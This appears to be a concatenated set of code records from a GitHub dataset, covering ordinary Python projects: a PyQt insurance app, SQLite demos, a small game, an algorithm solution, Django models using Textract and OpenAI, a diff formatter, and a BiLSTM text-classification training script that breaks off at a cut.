self.insurance_type.setCurrentText(insurance_type)\n layout.addWidget(self.insurance_type)\n\n # Get the current phone number\n mobile = main_window.table.item(index, 3).text()\n self.mobile = QLineEdit(mobile)\n self.mobile.setPlaceholderText(\"Mobile\")\n layout.addWidget(self.mobile)\n\n # Get the current age\n age = main_window.table.item(index, 4).text()\n self.age = QLineEdit(age)\n self.age.setPlaceholderText(\"Age\")\n layout.addWidget(self.age)\n\n # Add update button\n button = QPushButton(\"Update\")\n button.clicked.connect(self.update_insurance)\n layout.addWidget(button)\n\n self.setLayout(layout)\n\n def update_insurance(self):\n \"\"\"\n This function updates information about the insured people\n :return:\n \"\"\"\n connection = DatabaseConnection().connect()\n cursor = connection.cursor()\n cursor.execute(\"UPDATE insurance SET name = ?, insurance = ?, \"\n \"mobile = ?, age = ? WHERE id = ?\",\n (self.insurance_name.text(),\n self.insurance_type.itemText(self.insurance_type.\n currentIndex()),\n self.mobile.text(),\n self.age.text(),\n self.insurance_id))\n connection.commit()\n cursor.close()\n connection.close()\n # Refresh the table\n main_window.load_data()\n\n\nclass DeleteDialog(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Delete Insurance Data\")\n\n # Add delete confirmation box\n layout = QGridLayout()\n confirmation = QLabel(\"Are you sure you want the delete this record?\")\n yes = QPushButton(\"Yes\")\n no = QPushButton(\"No\")\n\n layout.addWidget(confirmation, 0, 0, 1, 2)\n layout.addWidget(yes, 1, 0)\n layout.addWidget(no, 1, 1)\n self.setLayout(layout)\n\n yes.clicked.connect(self.delete_insurance)\n\n def delete_insurance(self):\n \"\"\"\n This function deletes records in the database\n :return:\n \"\"\"\n # Get selected row index and insurance id\n index = main_window.table.currentRow()\n insurance_id = main_window.table.item(index, 0).text()\n\n # Connect the function with the database and set up the conditions\n connection = DatabaseConnection().connect()\n cursor = connection.cursor()\n cursor.execute(\"DELETE from insurance WHERE id = ?\", (insurance_id,))\n connection.commit()\n cursor.close()\n connection.close()\n # Refresh the table\n main_window.load_data()\n\n self.close()\n\n # Add the confirmation box with a message\n confirmation_widget = QMessageBox()\n confirmation_widget.setWindowTitle(\"Success\")\n confirmation_widget.setText(\"The record was deleted successfully\")\n confirmation_widget.exec()\n\n\napp = QApplication(sys.argv)\nmain_window = MainWindow()\nmain_window.show()\nmain_window.load_data()\nsys.exit(app.exec())\n","repo_name":"AdamStar9/Insurance-System-App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22977907664","text":"import sqlite3\n\n# create connection and cursor\nconn = sqlite3.connect(':memory:')\ncursor = conn.cursor()\n\n# Create the three tables\ncursor.execute(\"CREATE TABLE IF NOT EXISTS cars(car_id INTEGER PRIMARY KEY, car_name TEXT, car_price REAL)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS suppliers(supplier_id INTEGER PRIMARY KEY, supplier_name TEXT, supplier_location TEXT)\")\ncursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS parts(part_id INTEGER PRIMARY KEY,part_name TEXT, part_price REAL,\n car_id INTEGER, supplier_id INTEGER, FOREIGN KEY(supplier_id) REFERENCES suppliers(supplier_id),\n FOREIGN KEY(car_id) REFERENCES cars(car_id))\"\"\")\n\n\n#Inserting data into our tables\ncursor.execute(\"\"\"INSERT INTO cars\nVALUES(1,'Mercedes',30000)\"\"\")\n\ncursor.execute(\"\"\"INSERT INTO suppliers\nVALUES(11,'General_motors','Japan')\"\"\")\n\ncursor.execute(\"\"\"INSERT INTO parts\nVALUES(121,'Sproket',12,1,11)\"\"\")\n\n\nconn.commit()\n\n#Using python objects with :+ dictionary placeholder\n\nclass Cars:\n def __init__(self,id,name,price):\n self.id = id\n self.name = name\n self.price = price\n\n\nclass Suppliers:\n def __init__(self,id,name,location):\n self.id = id\n self.name = name\n self.location = location\n\n\nclass Parts:\n def __init__(self,id,name,price,car_id,supplier_id):\n self.id = id\n self.name = name\n self.price = price\n self.car_id = car_id\n self.supplier_id = supplier_id\ncar1 = Cars(12,'Premio',20000)\n\ncursor.execute(\"\"\"\nINSERT INTO cars \nVALUES(:car_id,:car_name,:car_price)\"\"\",\n{'car_id':car1.id,'car_name':car1.name,'car_price':car1.price})\n\nconn.commit()\n\nsupplier1 = Suppliers(12,'Toyota','China')\ncursor.execute(\"\"\"\nINSERT INTO suppliers \nVALUES(:supplier_id,:supplier_name,:supplier_location)\"\"\",\n{'supplier_id':supplier1.id,'supplier_name':supplier1.name,'supplier_location':supplier1.location})\n\nconn.commit()\n\npart1 = Parts(10, 'Gears', 20, 12, 10)\npart2 = Parts(13,'Wheel',17,1,11)\ncursor.execute(\"\"\"\nINSERT INTO parts\nVALUES(:part_id,:part_name,:part_price,:car_id,:supplier_id)\"\"\",\n {'part_id':part1.id,'part_name':part1.name, 'part_price':part1.price, 'car_id':part1.car_id, 'supplier_id':part1.supplier_id} );\n\ncursor.execute(\"\"\"\nINSERT INTO parts\nVALUES(:part_id,:part_name,:part_price,:car_id,:supplier_id)\"\"\",\n {'part_id':part2.id,'part_name':part2.name, 'part_price':part2.price, 'car_id':part2.car_id, 'supplier_id':part2.supplier_id} );\nconn.commit()\n\n#Updating parts table\npart1.name = 'Engine_block'\ncursor.execute(\"\"\"\nUPDATE parts\nSET part_name=:part_name\nWHERE part_id=:part_id\n\"\"\",{'part_name':part1.name,'part_id':part1.id})\n\nconn.commit()\n\n#Deleting Items\ncursor.execute(\"\"\"\nDELETE FROM parts\nWHERE car_id<>:car_id \"\"\",\n {'car_id':car1.id})\n\nconn.commit()\n\ncursor.execute(\"\"\"SELECT * FROM cars\"\"\")\nprint(cursor.fetchall())\ncursor.execute(\"\"\"\nSELECT * \nFROM cars\nWHERE car_price=:car_price\"\"\",\n {'car_price':20000})\nprint(cursor.fetchall())\n\n\ncursor.execute(\"\"\"SELECT * FROM suppliers\"\"\")\nprint(cursor.fetchall())\n\ncursor.execute(\"\"\"\nSELECT * \nFROM suppliers\nWHERE supplier_name = :supplier_name\"\"\",\n {'supplier_name':supplier1.name})\nprint(cursor.fetchall())\n\ncursor.execute(\"\"\"SELECT * FROM parts\"\"\")\nprint(cursor.fetchall())\n\n\nconn.close()","repo_name":"elvisotieno/dynamicprogramming","sub_path":"SQL/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30130324451","text":"from Keyboard import Keyboard\nfrom UI import UI\nfrom Game import Game\nimport Unit\nimport States\nimport WelcomePage\ntry:\n import simplegui\nexcept ImportError:\n import SimpleGUICS2Pygame.simpleguics2pygame as simplegui\n\n\ndef draw(canvas):\n\n global current_state, in_game, game, frame, ui\n print(\"in main: \" + current_state)\n if current_state is not States.STATES[1]:\n in_game = False\n # print(\"assigning in_game: \" + str(in_game))\n\n # loops through all the states:\n if current_state is States.STATES[0]:\n # print(\"In \" + str(States.STATES[0]) + \" condition\")\n current_state = WelcomePage.welcome_page_draw(frame, canvas, SIZE)\n print(\"current_state after button press: \" + str(current_state))\n\n elif current_state is States.STATES[1]:\n\n # Creates a new game instance if there isn't one yet\n if not in_game:\n game = Game(frame, SIZE)\n in_game = True\n\n current_state = game.game_draw(canvas)\n\n\ncurrent_state = States.STATES[0]\nUNIT = Unit.UNIT\nui = UI()\nin_game = False\n# define the size in terms of units\nSIZE = (UNIT * 10, UNIT * 8)\nkeyboard = Keyboard()\nframe = simplegui.create_frame(\"Frame\", SIZE[0], SIZE[1])\nframe.set_keydown_handler(keyboard.key_down)\nframe.set_keyup_handler(keyboard.key_up)\nframe.set_draw_handler(draw)\nframe.start()\n","repo_name":"Pickersgill/GamesGroup","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5451156175","text":"import sys\ninput = sys.stdin.readline\nnext_d = {1:2,2:1,3:4,4:3}\ndi,dj = [0,-1,1,0,0],[0,0,0,1,-1]\nR,C,M = map(int,input().split())\nboard = [[False for _ in range(C)]for _ in range(R)]\nans = 0\nfor _ in range(M):\n r,c,s,d,z = map(int,input().split())\n board[r-1][c-1] = (s,d,z)\nfor king in range(C):\n for i in range(R):\n if board[i][king]:\n s,d,z = board[i][king]\n board[i][king] = False\n ans+=z\n break\n tmp = {}\n for i in range(R):\n for j in range(C):\n if board[i][j]:\n s,d,z = board[i][j]\n board[i][j] = False\n ni = (i+di[d]*s)%(2*(R-1))\n nj = (j+dj[d]*s)%(2*(C-1))\n nd = d\n if ni>R-1 or nj>C-1:\n nd = next_d[d]\n if ni>R-1:\n ni = 2*(R-1)-ni\n else:\n nj = 2*(C-1)-nj\n if (ni,nj) in tmp:\n ss,dd,zz = tmp[(ni,nj)]\n if z>zz:\n tmp[(ni,nj)]=(s,nd,z)\n else:\n tmp[(ni,nj)]=(s,nd,z)\n for i,j in tmp:\n board[i][j] = tmp[(i,j)]\nprint(ans)","repo_name":"AhyeonKim/Algo-py-","sub_path":"BOJ/boj_17143_낚시왕.py","file_name":"boj_17143_낚시왕.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22647110294","text":"import os\n\nfrom django.core.files.base import ContentFile\nfrom django.db import models\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\n\nimport boto3\nfrom dotenv import load_dotenv\nimport openai\nfrom annoying.fields import AutoOneToOneField\n\nfrom apps.utils.models import BaseModel\nfrom ..users.models import CustomUser\nfrom .storage_backends import PrivateMediaStorage\n\nload_dotenv()\n\nAWS_ACCESS_KEY_ID = os.environ.get('TEXTRACT_CRED')\nAWS_SECRET_ACCESS_KEY = os.environ.get('TEXTRACT_PASS')\nAWS_REGION = os.environ.get('AWS_REGION')\n\n\nclass Document(BaseModel):\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE, related_name='documents')\n title = models.CharField(max_length=255, default=None)\n\n # file that holds the actual document\n file = models.FileField(storage=PrivateMediaStorage,\n upload_to=\"documents/\", default=None)\n\n text = models.JSONField(default=dict, blank=True, null=True)\n job_id = models.CharField(max_length=255, default=None, null=True, blank=True)\n\n ocr_text = models.TextField(default=None, null=True, blank=True)\n\n def is_processed(self):\n return self.job_id\n\n # convert created_at from GMT to local time\n def get_created_at(self):\n return self.created_at.astimezone()\n\n def __str__(self):\n return f'{self.title}'\n\n def clean(self):\n # check if the file is a pdf\n if not self.file.name.endswith('.pdf'):\n raise ValidationError(_('File must be a PDF'))\n\n # check if the file is less than 5mb\n if self.file.size > 5242880:\n raise ValidationError(_('File must be less than 5mb'))\n\n # check if the file is empty\n if self.file.size == 0:\n raise ValidationError(_('File cannot be empty'))\n\n # check if the file is a duplicate\n if Document.objects.filter(file=self.file).exists():\n raise ValidationError(_('File already exists'))\n\n # trim whitespace from title\n self.title = self.title.strip()\n\n def start_text_extraction(self):\n # make a boto3 s3 client to get the file from a user's private s3 bucket\n # start text extraction job\n textract = boto3.client('textract', aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n region_name=AWS_REGION)\n\n name = 'private/' + self.file.name\n # make a boto3 s3 client to get the file from a user's private s3 bucket\n\n job_id = textract.start_document_text_detection(\n DocumentLocation={\n 'S3Object': {\n 'Bucket': os.environ.get('AWS_STORAGE_BUCKET'),\n 'Name': name\n }\n })\n self.job_id = job_id['JobId']\n self.save()\n\n def get_text_extraction(self):\n # if the job is complete, it will return the text\n # if the job is not complete, it will return None\n # if the job is already done, it will return the text\n if self.job_id == 'PROCESSED':\n return self.text\n\n textract = boto3.client('textract', aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n region_name=AWS_REGION)\n\n response = textract.get_document_text_detection(JobId=self.job_id)\n\n if response['JobStatus'] == 'IN_PROGRESS':\n return None\n elif response['JobStatus'] == 'FAILED':\n return 'FAILED'\n elif response['JobStatus'] == 'SUCCEEDED':\n self.job_id = 'PROCESSED'\n self.text = response\n self.save()\n return 'DONE'\n\n def extract_text(self):\n # iteratively builds a string of the entire document\n text = self.text\n blocks = text['Blocks']\n pages = []\n doc_text = ''\n doc_text.encode('utf-8')\n for block in blocks:\n if block['BlockType'] == 'PAGE':\n pages.append(block['Page'])\n\n # TODO: add processing by line location\n\n for page in range(1, max(pages) + 1):\n page_text = ''\n for block in blocks:\n if block['BlockType'] == 'LINE':\n page_text += block['Text'] + ' ' + '\\n'\n doc_text += page_text + '\\n'\n\n # save the file to the ocr_text field\n self.ocr_text = doc_text\n self.save()\n\n def create_summary(self):\n \"\"\"\n create a summary of the document\n \"\"\"\n openai.api_key = os.environ.get('OPENAI_KEY')\n text_to_summarize = self.ocr_text\n\n text_to_summarize = text_to_summarize.split('.')\n # list of sentence strings\n broken_text = []\n\n block = []\n block_size = 0\n for sentence in text_to_summarize: # string\n # count characters in sentence\n if block_size + len(sentence) < 12000: # should be approximately within token length\n block.append(sentence)\n block_size += len(sentence)\n # if the block is too long, append it to the broken text list and reset the block\n elif block_size + len(sentence) >= 12000:\n broken_text.append(block)\n block = []\n # if the sentence is the last sentence in the document\n if sentence == text_to_summarize[-1]:\n broken_text.append(block)\n\n summary = ''\n for block in broken_text:\n block_content = ' '.join(block).strip()\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f'Summarize the given text for a university student.'\n f'Give them the most important information to '\n f'learn the content of this text.\\n'\n f'Given text: \\n {block_content} <|endoftext|>',\n max_tokens=600,\n temperature=0.8,\n presence_penalty=.15,\n )\n # basically how you get the summary for each block\n summary += response['choices'][0]['text'] + '\\n'\n\n self.summary.content = summary\n self.summary.save()\n\n def create_questions(self):\n \"\"\"\n generate questions for the document\n \"\"\"\n openai.api_key = os.environ.get('OPENAI_KEY')\n text_to_generate_questions = self.summary.get_summary\n\n num_questions = len(text_to_generate_questions) / 100\n if num_questions <= 1:\n num_questions = 3\n\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=f'Given this text, generate {num_questions} questions to test'\n f'understanding of the text. The questions should'\n f'be at the level of a university student, and test'\n f'recall of the content, background information, and application of the content'\n f'to other mediums. They should not be easy, unless they test recall.\\n'\n f'At least one of the questions should relate to an application of the content. \\n'\n f'Examples:\\n'\n f'Q: What is the main idea of this text?\\n'\n f'A: The author argues for institutional reform to improve the lives of the poor.\\n'\n f'Q: What does the term \\\"institutional reform\\\" mean?\\n'\n f'A: Institutional reform is a change in the way that a society is organized.\\n'\n f'Q: Why would institutional reform be necessary, according to the author?\\n'\n f'A: The author argues that the rich owe a moral debt to humanity.\\n'\n f'Q: What would institutional reform create? (The answer to this is not provided by the document)\\n'\n f'A: A more just society.\\n'\n f'Given text: \\n {text_to_generate_questions}'\n f'<|endoftext|>',\n max_tokens=600,\n temperature=0.8,\n presence_penalty=.3,\n )\n\n questions = response['choices'][0]['text']\n # questions will be in Q: \\n A: \\n format.\n # get question answer pairs, generated from paired Q: and A: prompts.\n question_pair = questions.split('Q: ')\n question_answer_pairs = []\n for pair in question_pair:\n if pair != '' or pair != '\\n\\n':\n question_answer_pairs.append(pair.split('A: '))\n\n # create question object for each pair\n for pair in question_answer_pairs:\n if len(pair) == 2:\n question = pair[0].strip()\n answer = pair[1].strip()\n Question.objects.create(\n question=question,\n answer=answer,\n document=self\n )\n\n\n# summary, questions are one-one field with document\n\nclass Summary(BaseModel):\n document = AutoOneToOneField(\"Document\", on_delete=models.CASCADE, related_name=\"summary\",\n default=None, primary_key=True)\n content = models.TextField(null=True, blank=True, default=None)\n\n @property\n def get_summary(self):\n return self.content\n\n def __str__(self):\n return f\"Summary of {self.document.title}\"\n\n\nclass Question(BaseModel):\n document = models.ForeignKey(\"Document\", on_delete=models.CASCADE, related_name=\"questions\",\n default=None)\n\n # delimited string, split by question mark\n question = models.TextField(default=None)\n answer = models.TextField(default=None)\n\n def __str__(self):\n return f\"Question of {self.document.title}\"\n","repo_name":"darinkishore/searing_ai","sub_path":"apps/data/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"23613350217","text":"from json import JSONEncoder\n\nfrom gendiff.search_difference import is_dictionary\n\nprefixes = {\n 'removed': ' - ',\n 'added': ' + ',\n 'not changed': ' ',\n 'updated': ' ',\n 'nested': ' '\n}\n\n\ndef format_value(value, depth=0):\n \"\"\"Returns formated value if it necessary\"\"\"\n if type(value) == bool or value is None:\n return JSONEncoder().encode(value)\n elif is_dictionary(value):\n return get_string_from_dictionary(value, depth + 1)\n return str(value)\n\n\ndef format_stylish(diff, depth=0):\n \"\"\"\n Returns formated difference between two files in stylish format\n arguments:\n diff: raw differene between two files\n depth: level of nesting to build correct difference\n \"\"\"\n indent = ' ' * depth\n difference = ['{']\n keys = diff.keys()\n\n for key in keys:\n status = diff[key]['status']\n string = get_formated_string(indent, status, diff, key, depth)\n difference.append(string)\n difference.append(f'{indent}}}')\n return '\\n'.join(difference)\n\n\ndef get_formated_string(indent, status, diff, key, depth):\n \"\"\"\n Return formated string in dependence of node's status\n arguments:\n indent: amount of whitespaces to build stylish representation\n status: status of node\n diff: difference between two files\n key: current key\n depth: node's level of nesting\n \"\"\"\n if status == 'added':\n string = (f'{indent}{prefixes[\"added\"]}{key}: '\n f'{format_value(diff[key][\"value\"], depth)}')\n\n elif status == 'removed':\n string = (f'{indent}{prefixes[\"removed\"]}{key}: '\n f'{format_value(diff[key][\"value\"], depth)}')\n\n elif status == 'not changed':\n string = (f'{indent}{prefixes[\"not changed\"]}{key}: '\n f'{format_value(diff[key][\"value\"], depth)}')\n\n elif status == 'updated':\n string = (f'{indent}{prefixes[\"removed\"]}{key}: '\n f'{format_value(diff[key][\"value1\"], depth)}\\n'\n f'{indent}{prefixes[\"added\"]}{key}: '\n f'{format_value(diff[key][\"value2\"], depth)}')\n\n elif status == 'nested':\n string = (f'{indent}{prefixes[status]}{key}: '\n f'{format_stylish(diff[key][\"children\"], depth + 1)}')\n return string\n\n\ndef get_string_from_dictionary(diff, depth):\n \"\"\"\n Return string representation of value if it's dictionary\n arguments:\n diff: difference between two files\n depth: node's level of nesting\n \"\"\"\n indent = ' ' * depth\n nested_diff = []\n if is_dictionary(diff):\n nested_diff.append('{')\n keys = diff.keys()\n for key in keys:\n string = (f'{indent}{prefixes[\"not changed\"]}{key}: '\n f'{get_string_from_dictionary(diff[key], depth + 1)}')\n nested_diff.append(string)\n nested_diff.append(f'{indent}}}')\n else:\n string = format_value(diff, depth)\n nested_diff.append(string)\n return '\\n'.join(nested_diff)\n","repo_name":"SaltyFingers/python-project-lvl2","sub_path":"gendiff/formaters/stylish.py","file_name":"stylish.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40909878063","text":"from agenda import Agenda\nfrom chart import Chart\n\n\nclass Parser(object):\n def __init__(self, logger=None):\n self.logger = logger\n\n def parse(self, start_symbol, lexicon, grammar, sentence):\n agenda = Agenda(self.logger)\n chart = Chart(grammar, agenda, logger=self.logger)\n chart.introduce_symbol(start_symbol, 0)\n position = 0\n while position < len(sentence) or agenda.size() > 0:\n if agenda.size() == 0:\n agenda.add_alternatives(\n lexicon.get_interpretations(sentence[position]), position)\n position = position + 1\n chart.extend_arcs(agenda.next_constituent())\n","repo_name":"minopret/topdown","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8485936247","text":"\"\"\"Tokenize str|List[str] to sents.\"\"\"\n# pylint: disable=unused-argument\n\nfrom typing import (\n List,\n Optional,\n Union,\n)\n\nfrom pathlib import Path\nfrom joblib import Memory\nfrom polyglot.text import Detector\nfrom logzero import logger\n\nfrom hlm_texts.seg_text import seg_text\n\nmemory = Memory(location=Path(\"~/joblib_cache\").expanduser(), verbose=0)\n\n\n# fmt: off\n# @memory.cache(ignore=['debug'])\ndef _sent_tokenizer(\n text: Union[str, List[str]],\n lang: Optional[str] = None,\n debug: bool = False, # when True, disable joblib.Memory.cache\n) -> List[str]:\n # fmt: on\n \"\"\"Tokenize str|List[str] to sents.\"\"\"\n if isinstance(text, str):\n text = [text]\n\n if lang is None:\n try:\n lang = Detector(\" \".join(text)).language.code\n except Exception as exc:\n logger.warning(\"polyglot.text.Detector exc: %s, setting to 'en'\", exc)\n logger.info(\" Try to pass lang (e.g. lang='en') to sent_tokenizer\")\n lang = 'en'\n\n res = []\n for elm in text:\n res.extend(seg_text(elm, lang=lang))\n\n return res\n\n\nsent_tokenizer = memory.cache(_sent_tokenizer, ignore=['debug'])\n","repo_name":"ffreemt/hlm-texts","sub_path":"hlm_texts/sent_tokenizer.py","file_name":"sent_tokenizer.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"22464397509","text":"from __future__ import unicode_literals\n\nfrom django import forms\nfrom django.utils.translation import ugettext as _\nfrom django_core.forms.mixins.users import UserAuthorizationRequiredForm\nfrom django_core.forms.widgets import ReadonlyWidget\nfrom umanage.change_email.emails import send_change_email_activation_email\nfrom umanage.change_email.emails import send_change_email_notice_email\nfrom umanage.models import ChangeEmailAuthorization\n\n\nclass ChangeEmailForm(UserAuthorizationRequiredForm):\n \"\"\"Form for changing a user's email.\"\"\"\n error_messages = dict(UserAuthorizationRequiredForm.error_messages, **{\n 'invalid_confirm_email': _(\"The new email and new email confirm must \"\n \"match exactly. Please enter it again.\"),\n })\n current_email = forms.EmailField(label=_('Current Email'),\n max_length=100, widget=ReadonlyWidget,\n required=False)\n new_email = forms.EmailField(label=_('New Email'))\n new_email_confirm = forms.EmailField(label=_('New Email Confirm'))\n\n def __init__(self, *args, **kwargs):\n super(ChangeEmailForm, self).__init__(*args, **kwargs)\n\n if 'current_email' not in self.initial:\n self.initial['current_email'] = self.user.email\n\n self.fields.keyOrder = ('current_email', 'password', 'new_email',\n 'new_email_confirm')\n\n def clean_new_email_confirm(self):\n new_email = self.cleaned_data['new_email']\n new_email_confirm = self.cleaned_data['new_email_confirm']\n\n if new_email != new_email_confirm:\n raise forms.ValidationError(\n self.error_messages['invalid_confirm_email'],\n code='invalid_confirm_email',\n )\n\n return new_email_confirm\n\n def send_email(self):\n \"\"\"Sends the necessary emails and returns the ChangeEmail object. This\n method assumes the form has already made a call to ``.clean(...)``.\n \"\"\"\n authorization = ChangeEmailAuthorization.objects.create(\n email_address=self.cleaned_data.get('new_email'),\n created_user=self.user\n )\n send_change_email_notice_email(\n to_user=self.user,\n authorization=authorization\n )\n send_change_email_activation_email(\n to_user=self.user,\n to_email=self.cleaned_data.get('new_email'),\n authorization=authorization\n )\n return authorization\n","repo_name":"InfoAgeTech/django-umanage","sub_path":"umanage/change_email/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"30142561257","text":"import sys\nfrom argparse import ArgumentParser\nfrom os.path import expandvars\n\nimport pylab as P\nfrom matplotlib import rc\n\nfrom . argumentparsing import parse_strip_known_args\n\ndef set_latex_defaults():\n rc('ps',usedistiller='xpdf')\n rc('text', usetex=True)\n rc('font', family='serif', serif=\"Computer Modern Roman\")\n\n\n\ndef get_bw():\n parser = ArgumentParser()\n parser.add_argument(\"--bw\", action=\"store_true\", default=False)\n args=parse_strip_known_args(parser)\n global bw\n bw=args.bw\n return bw\n\n\ndef save(base):\n base=expandvars(base)\n if bw:\n P.savefig('%s_bw.pdf' % base)\n P.savefig('%s_bw.eps' % base)\n else:\n P.savefig('%s_color.pdf' % base)\n P.savefig('%s_color.eps' % base)\n\n","repo_name":"joshualande/PhD-python","sub_path":"lande/utilities/pubplot.py","file_name":"pubplot.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"22107698129","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: pkishore\n\"\"\"\nimport torch\nfrom torchtext import data\nimport torch.nn as nn\nfrom torch import optim\nimport numpy as np\nimport time, random\nimport os\nfrom tqdm import tqdm\nfrom gensim.models import KeyedVectors\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom BiLSTM import BiLSTM\n\nBATCH_SIZE = 50 #Number of examples in the batch.\nEPOCHS = 10 #Number of Epochs\nUSE_GPU = torch.cuda.is_available() #Is GPU Available\nEMBEDDING_DIM = 300 #Input or Embedding Dimension\nHIDDEN_DIM = 200 #Hidden Dimension\nvector_file = './data/embeddings.vec' #Path for Fasttext Embeddings\nbest_dev_acc = 0.0\n\ntext_field = data.Field(lower=True)\nlabel_field = data.Field(sequential=False)\n#For loading training, validation and test corpuses using split method\ntrain, valid, test = data.TabularDataset.splits(path='./data/dataset', train = 'newtrain.txt',\n validation = 'newvalidation.txt',\n test = 'newtest.txt',\n fields = [('sentence', text_field), ('isQuestion', label_field)],\n format = 'csv', \n csv_reader_params = {'delimiter': '|'})\n#Construct the Vocab object for text and label field from train, validation and test datasets.\ntext_field.build_vocab(train, valid, test)\nlabel_field.build_vocab(train, valid, test)\n#Train, Test and Validation Iterator\ntrain_iter, valid_iter, test_iter = data.BucketIterator.splits((train, valid, test),\n batch_sizes=(BATCH_SIZE, BATCH_SIZE, BATCH_SIZE), sort_key=lambda x: len(x.sentence), repeat=False)\n\nloss_function = nn.NLLLoss() #Loss Function\n\n# Loading FastText Vectors\nprint('Loading fasttext vectors.')\nembed_space = KeyedVectors.load_word2vec_format(vector_file, binary = False)\nprint('Finished loading fasttext vectors.')\n\nword_to_idx = text_field.vocab.stoi #Syntactic Sugar to get word indices from vocabulary\npretrained_embeddings = np.random.uniform(-0.25, 0.25, (len(text_field.vocab), 300))\npretrained_embeddings[0] = 0\n\n# Populating the required embeddings\nfor key in tqdm(embed_space.vocab.keys()):\n pretrained_embeddings[word_to_idx[key]-1] = embed_space[key]\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(\"Using: \" + str(USE_GPU))\n\n\ntimestamp = str(int(time.time()))\nmodel = BiLSTM(embedding_dim=EMBEDDING_DIM, hidden_dim=HIDDEN_DIM, vocab_size=len(text_field.vocab), label_size=len(label_field.vocab)-1,\\\n use_gpu=USE_GPU, batch_size=BATCH_SIZE)\nmodel.to(device)\nmodel.embeddings.weight.data.copy_(torch.from_numpy(pretrained_embeddings))\nmodel.embeddings.weight.requires_grad = False # Beacuse we don't want to finetune the embeddings weights, and thus excluded from model.parameters()\nbest_model = model #Best model initially intiatlized as Model\noptimizer = optim.Adam(model.parameters(), lr=1e-3) #Loss Gradient\nout_dir = os.path.abspath(os.path.join(os.path.curdir, \"runs\", timestamp))\n\n#Calculating Accuracy\ndef get_accuracy(truth, pred):\n assert len(truth) == len(pred)\n right = 0\n for i in range(len(truth)):\n if truth[i] == pred[i]:\n right += 1.0\n return right/len(truth)\n\n#For training the model\ndef train_epoch_progress(model, train_iter, loss_function, optimizer, text_field, label_field, epoch, device):\n model.train()\n avg_loss = 0.0\n truth_res = []\n pred_res = []\n count = 0\n for batch in tqdm(train_iter, desc='Train epoch '+str(epoch+1)):\n sent, label = batch.sentence, batch.isQuestion\n sent, label = sent.to(device), label.to(device)\n label.data.sub_(1)\n truth_res += list(label.data)\n model.batch_size = len(label.data)\n model.hidden = model.init_hidden()\n pred = model(sent)\n pred_cpu = pred.cpu()\n pred_label = pred_cpu.data.max(1)[1].numpy()\n pred_res += [x for x in pred_label]\n model.zero_grad()\n loss = loss_function(pred, label)\n avg_loss += loss.item()\n count += 1\n loss.backward()\n optimizer.step()\n avg_loss /= len(train_iter)\n acc = get_accuracy(truth_res, pred_res)\n return avg_loss, acc\n\n#For evaluating the model\ndef evaluate(model, data, loss_function, name, device):\n model.eval()\n avg_loss = 0.0\n truth_res = []\n pred_res = []\n for batch in tqdm(data):\n sent, label = batch.sentence, batch.isQuestion\n sent, label = sent.to(device), label.to(device)\n label.data.sub_(1)\n truth_res += list(label.data)\n model.batch_size = len(label.data)\n model.hidden = model.init_hidden()\n pred = model(sent)\n pred_cpu = pred.cpu()\n pred_label = pred_cpu.data.max(1)[1].numpy()\n pred_res += [x for x in pred_label]\n loss = loss_function(pred, label)\n avg_loss += loss.item()\n avg_loss /= len(data)\n acc = get_accuracy(truth_res, pred_res)\n print(name + ': loss %.2f acc %.1f' % (avg_loss, acc*100))\n return acc\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\nfor epoch in range(EPOCHS):\n avg_loss, acc = train_epoch_progress(model, train_iter, loss_function, optimizer, text_field, label_field, epoch, device)\n tqdm.write('Train: loss %.2f acc %.1f' % (avg_loss, acc*100))\n with torch.no_grad():\n dev_acc = evaluate(model, valid_iter, loss_function, 'Dev', device)\n if dev_acc > best_dev_acc:\n if best_dev_acc > 0:\n os.system('rm '+ out_dir + '/best_model' + '.pth')\n best_dev_acc = dev_acc\n best_model = model\n torch.save(best_model.state_dict(), out_dir + '/best_model' + '.pth')\n # evaluate on test with the best dev performance model\n test_acc = evaluate(best_model, test_iter, loss_function, 'Test', device)\n\ntest_acc = evaluate(model, test_iter, loss_function, 'Final Test', device)\nprint(\"Test Accuracy: \", 